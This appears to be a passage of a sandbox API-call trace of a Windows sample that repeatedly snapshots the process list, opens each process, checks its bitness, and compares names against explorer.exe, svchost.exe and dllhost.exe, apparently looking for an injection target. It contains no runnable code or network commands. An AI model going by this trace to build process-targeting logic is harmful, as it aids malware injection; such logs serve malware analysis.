lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0244.929] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0244.930] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.930] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.930] CloseHandle (hObject=0xec) returned 1 [0244.930] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0244.930] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0244.930] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.930] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.930] CloseHandle (hObject=0xec) returned 1 [0244.930] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.931] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0244.931] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.931] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0244.931] CloseHandle (hObject=0xec) returned 1 [0244.931] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0244.932] CloseHandle (hObject=0xe8) returned 1 [0244.932] Sleep (dwMilliseconds=0x3e8) [0245.943] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0245.944] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0245.945] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0245.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0245.945] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0245.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0245.946] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0245.946] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0245.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0245.947] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0245.947] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0245.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0245.948] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0245.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0245.949] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0245.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0245.949] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0245.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0245.949] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0245.950] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0245.950] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0245.951] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0245.951] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0245.952] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0245.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0245.952] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0245.953] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0245.953] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0245.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0245.954] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.954] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.954] CloseHandle (hObject=0xec) returned 1 [0245.954] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0245.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0245.955] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0245.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0245.955] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.955] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.955] CloseHandle (hObject=0xec) returned 1 [0245.955] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0245.956] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0245.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0245.956] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0245.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0245.957] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.957] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.957] CloseHandle (hObject=0xec) returned 1 [0245.957] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0245.957] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0245.957] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0245.957] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0245.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0245.957] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.957] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.957] CloseHandle (hObject=0xec) returned 1 [0245.957] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0245.957] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0245.957] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0245.957] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0245.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0245.958] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.958] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.958] CloseHandle (hObject=0xec) returned 1 [0245.958] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0245.958] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0245.958] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0245.958] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0245.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0245.959] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.959] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.959] CloseHandle (hObject=0xec) returned 1 [0245.959] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0245.959] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0245.959] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0245.959] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0245.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0245.959] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.959] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.960] CloseHandle (hObject=0xec) returned 1 [0245.960] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0245.960] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0245.960] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0245.960] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0245.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0245.960] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.960] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.960] CloseHandle (hObject=0xec) returned 1 [0245.960] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0245.960] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0245.960] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0245.960] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0245.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0245.961] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.961] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.961] CloseHandle (hObject=0xec) returned 1 [0245.961] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0245.961] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0245.961] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0245.961] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0245.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0245.961] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.962] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.962] CloseHandle (hObject=0xec) returned 1 [0245.962] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0245.962] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0245.962] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0245.962] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0245.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0245.962] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.962] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.962] CloseHandle (hObject=0xec) returned 1 [0245.962] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0245.962] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0245.962] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0245.962] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0245.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0245.963] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.963] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.963] CloseHandle (hObject=0xec) returned 1 [0245.963] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0245.963] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0245.963] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0245.963] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0245.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0245.964] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.964] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.964] CloseHandle (hObject=0xec) returned 1 [0245.964] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0245.964] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0245.964] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0245.964] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0245.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0245.964] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.964] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.964] CloseHandle (hObject=0xec) returned 1 [0245.964] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0245.964] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0245.964] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0245.964] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0245.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0245.965] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.965] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.965] CloseHandle (hObject=0xec) returned 1 [0245.965] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0245.965] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0245.965] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0245.965] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0245.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0245.966] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.966] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0245.967] CloseHandle (hObject=0xec) returned 1 [0245.967] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0245.967] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0245.967] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0245.967] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 